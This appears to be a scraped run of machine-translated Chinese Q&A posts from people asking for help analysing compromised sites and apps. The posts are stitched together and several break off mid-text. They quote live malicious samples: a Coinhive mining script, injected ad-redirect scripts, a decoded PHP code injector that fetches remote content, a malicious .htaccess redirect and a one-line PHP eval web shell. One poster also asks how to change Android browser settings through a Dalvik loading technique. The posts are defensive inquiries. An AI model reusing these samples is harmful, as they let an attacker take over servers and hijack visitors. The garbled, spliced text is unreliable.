最近,我一直试图了解一些应用程序如何通过像主页这样的代码来改变Android浏览器设置.这就是我来的"远".它不支持android api和普通代码.您必须使用本机代码.我分析了一个广告sdk,这是大多数应用程序设法更改设置的方式.我的第一个想法是,它可能会进行某种根剥削,以获得存储设置的共享首选项的完全访问权限.
我对sdk做了som研究和分析,发现了sdk和一个名为Plankton的恶意软件的相似之处.恶意软件和SDK都会收集设备信息并向C&C服务器发送请求,并下载带有本机代码的jar文件.它"利用Dalvik类加载功能保持隐身",而不是使用root漏洞.它支持一些命令,如设置主页,快捷方式和书签以及收集浏览器历史记录.
我试图通过使用url从服务器手动下载jar并从sdk添加发布数据,但我没有让它工作.也许我已经搞砸了帖子数据.如何在没有root访问权限的情况下更改设置,而是使用dalivk exploit?任何想法将不胜感激.
SDK的链接
我发现我的一些用户正在访问一个似乎在其代码中有比特币挖掘JS脚本的网站:
<script src = "hxxps://coin-hive.com/lib/coinhive.min.js"></script><script>
var miner = new CoinHive.Anonymous('3858f62230ac3c915f300c664312c63f');
miner.start();
</script>
我的问题是,即使他们离开页面,用户仍然会被感染?当用户在浏览器中打开页面时,这些程序是否只能工作?
问题: -有时,点击NAVBAR菜单或我的bootstrap网站上的任何div,它会重定向到新标签中的广告或未知链接.
http://cobalten.com/afu.php?zoneid=1365143&var=1492756
从托管文件导入的链接: -
<link rel="stylesheet" type="text/css" href="css\bootstrap.min.css">
<script src="js/jquery.min.js"></script>
<script src="js/main.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
<link rel="stylesheet" type="text/css" href="css\style.css">
<link href="https://fonts.googleapis.com/css?family=Montserrat" rel="stylesheet" type="text/css">
<link href="https://fonts.googleapis.com/css?family=Lato" rel="stylesheet" type="text/css">
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.8/css/all.css" integrity="shaxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
crossorigin="anonymous">
<script src="https://maps.googleapis.com/maps/api/js?key=xxxxxxxxxxxxxxxxxxxxxxxxxx&callback=myMap "></script>
我在检查中得到了什么: -
当我点击菜单上没有重定向时,我多次检查了我的代码..我发现没有任何可疑......但是当我点击链接重定向链接时,我在浏览器中检查了我的代码,我可以清楚地看到几个脚本源添加到我的文件(只能在浏览器的检查模式下查看).它们不写入我的代码.我的代码的未知部分是..
1)HERE以下2个脚本正在替换head标记中的脚本js/jquery.min.js
<script src='//117.240.205.115:3000/getjs?nadipdata="%7B%22url%22:%22%2Fjs%2Fjquery.min.js%22%2C%22referer%22:%22http:%2F%2Famans.xyz%2F%22%2C%22host%22:%22amans.xyz%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D"&screenheight=768&screenwidth=1360&tm=1530041241377&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0' async=""></script>
<script src="http://amans.xyz/js/jquery.min.js?cb=1530041241381&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag" type="text/javascript"></script>
2)在导入google api后,这个正被添加到body标签中
<span id="notiMain">
<script src="//go.oclasrv.com/apu.php?zoneid=1492761" type="text/javascript">< /script>
</span>
3)这个也是身体标签.
<div class="pxdouz70egp12" style="left: 0px; top: 9360px; width: 658px; height: 650px; background-image: url("data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"); position: absolute; z-index: 2000; </div>
4)检查重定向链接.HEADERS信息: -
Request URL: http://cobalten.com/apu.php?zoneid=1492761&_=1530105294644
Request Method: …现代浏览器的一个更强大的功能是软件开发人员能够编写浏览器扩展以增强,修改和调整用户访问的页面.随着我们的生活越来越多地迁移到浏览器上,我们是否有可能将自己暴露在由安装恶意本质的浏览器扩展所造成的大量隐私和安全漏洞中?
我意识到如果作者没有尝试混淆行为,这些扩展的源代码是可提取的和可读的.但是,这种类型的审查的有效性受到浏览器的影响,该浏览器鼓励用户使其扩展更新.虽然扩展的1.0版本可能是无害的,但是用户浏览器可能会建议升级到1.1版,其可能包含可用于从受损浏览器的屏幕上抓取信息的恶意代码.
作为浏览器扩展的用户和开发者,开发人员的声誉是唯一能够向用户保证他们的浏览活动是安全的吗?是否有任何机制来帮助保护用户免受受损的浏览器扩展?
是否有任何最佳实践来开发扩展,以便用户确保他们安装和更新的代码本质上是良性的?
我发现这个代码注入客户端站点上的许多PHP文件中.当然,原件已被混淆和编码.我设法解码它并将其格式化为当前表单.
我的问题是:它到底完成了什么,代码是否表明它是如何注入的,因此揭示了未来如何防止这种情况?
<?php
if(!function_exists('check_wp_head_load')){
function check_wp_head_load(){
if(!function_exists('cc')){
function cc($ll_0){
$ll_1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)";
if(function_exists('curl_init')){
$ll_2 = curl_init();
curl_setopt($ll_2, 10002, $ll_0);
curl_setopt($ll_2, 42, 0);
curl_setopt($ll_2, 13, 30);
curl_setopt($ll_2, 19913, 1);
curl_setopt($ll_2, 10018, $ll_1);
if(!(@ini_get("safe_mode") || @ini_get("open_basedir"))){
@curl_setopt($ll_2, 52, 1);
}
@curl_setopt($ll_2, 68, 2);
$ll_3 = curl_exec($ll_2);
curl_close($ll_2);
if($ll_3 !== false){
return $ll_3;
}
}
else if(function_exists('fsockopen')){
global $ll_4;
$ll_0 = str_replace("http://", "", $ll_0);
if(preg_match("#/#", "$ll_0")){
$ll_5 = $ll_0;
$ll_0 = @explode("/", $ll_0);
$ll_0 = $ll_0[0];
$ll_5 …我们的一个客户端站点已被黑客攻击,并且.htaccess文件已替换为以下内容.
任何人都可以完全分解这是做什么的吗?
根据我的知识,它看起来像是在引用页面,然后是用户代理,它设置了一个名为jpg的cookie,然后将您重定向到siknsty.malicioussite.com,然后尝试下载一些恶意软件,然后再将您引回原始引用网站(所以你的路径是谷歌>恶意软件页>谷歌)
如果设置了jpg cookie,则它不会引用您的任何地方,因为它假定您已经下载了恶意软件.(这可能是错误的 - 我认为它应该引用您重定向的下面列出的页面).
我不确定其余的,或者它是否使用.htaccess将zip文件屏蔽为jpgs(我想我正在阅读它)...
任何人的想法?
此外,任何想法如何在服务器上形成?所有权限都设置为0644,并且在同一帐户下的Windows和Linux服务器上都发生了这种情况.
星期三早上ballache啊.
哦,不要去那个网站.
<IfModule prefork.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)? (tweet|twit|linkedin|instagram|facebook\.|myspace\.|bebo\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(hi5\.|blogspot\.|friendfeed\.|friendster\.|google\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(lycos\.|metacrawler\.|mail\.|pinterest|instagram).*$ [NC]
RewriteCond %{HTTP_REFERER} !^.*(imgres).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|IRIX|Jakarta|JetBrains).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC] …我的托管服务提供商最近暂停了我的网站,因为它上面发送了大量垃圾邮件.最初我和提供商认为这是由于几天前我在服务器上放置的电子邮件活动的不安全形式.我从服务器上删除了带有表单的页面,但服务器仍在发送垃圾邮件.
我在服务器根目录的"css"文件夹中找到了一个名为7c32.php的php文件.我绝对没有成功.这是文件中的代码:
<?php if(isset($_POST["cod\x65"])){eval(base64_decode($_POST["co\x64e"]));}?>
通过在线解码器运行后,这就是它的结果:
if(isset($_POST["code"])){eval(base64_decode($_POST["code"]));
我做了一些关于恶意php文件的阅读,并看到了eval(和base64_decode字符串非常可疑.我浏览了服务器日志文件,看到了几个来自沙特阿拉伯的ip地址的7c32.php文件的帖子查询.
我删除了php文件,更新了所有过时的wordpress主题和插件(以及自己的平台,并将密码更改为FTP服务器和Wordpress管理帐户更安全的东西.
我还能做些什么来确保我的服务器安全吗?我即将去搜索这些base64和eval(服务器上每个其他php文件中的字符串,但除此之外,我没有想法.
这个PHP脚本似乎太短了不能造成任何损害,但还有什么可以发送所有垃圾邮件?
任何帮助将不胜感激.
我创建了一个Android应用程序,但Avast将此检测为恶意软件.为什么是这样?
任何人都可以告诉我更多关于此的信息,所以我可以在这个应用程序中找到究竟被认为是病毒的内容.这是一个非常简单的应用程序,所以我不知道是什么导致了这个.
我已将此报告为误报,并通过他们的论坛与avast联系.但是我觉得在这里发布也不会有什么伤害,也许有人有类似的问题.
我一进入网站,我的浏览器(chrome)就下载了这个脚本.它没有混淆,也没有太久,我认为它是无害的,但我不知道PHP,所以我不确定.该文件被调用csync.php.
Chrome使它看起来像是唯一下载的文件.有可能这不是真的吗?
有人能说清楚这是做什么的吗?
<?php
require_once("config/config.php");
require_function("util/StaticFunctions.php");
require_function("service/ServiceFactory.php");
require_function("bo/BoFactory.php");
require_function("data/DataFactory.php");
require_function("util/UtilFactory.php");
require_function("data/AkamaiLoggingService.php");
include 'config/setup/config-setup-skenzo.php';
include 'config/skenzo_request_variables.php';
header('P3P:CP="NON DSP COR NID CUR ADMa DEVo TAI PSA PSDo HIS OUR BUS COM NAV INT STA"');
header('Content-type: text/html');
header('Cache-Control: no-cache, no-store, must-revalidate');
header('Pragma: no-cache');
header('Expires: -1');
$visitorInfo = BoFactory::getVisitorInfo();
$vsid = $visitorInfo->getVisitorId();
$dataNames = VisitorInfo::$VSID_DATA_NAMES;
$mName = BoFactory::getInboundHttpRequest()->getSanitizedValueOfParam('type');
$mValue = BoFactory::getInboundHttpRequest()->getSanitizedValueOfParam('ovsid');
$vsCk = VISITOR_ID;
$vsDaCk = VISITOR_DATA;
$sepVal = VisitorInfo::$VALUE_SEP;
$sepTime = VisitorInfo::$TIME_SEP;
$vsDaTime = VisitorInfo::$VSID_DATA_TIME;
echo '<html> <head></head> <body> …我想在文件上传到服务器之前扫描文件是否有病毒和恶意软件。例如,一旦用户上传文件,应该有一个扫描程序来检测是否存在病毒或恶意软件并立即拒绝它。无论如何,在将文件上传到服务器之前是否要对其进行扫描?就像使用 Javascript 或任何软件开发工具一样。
谢谢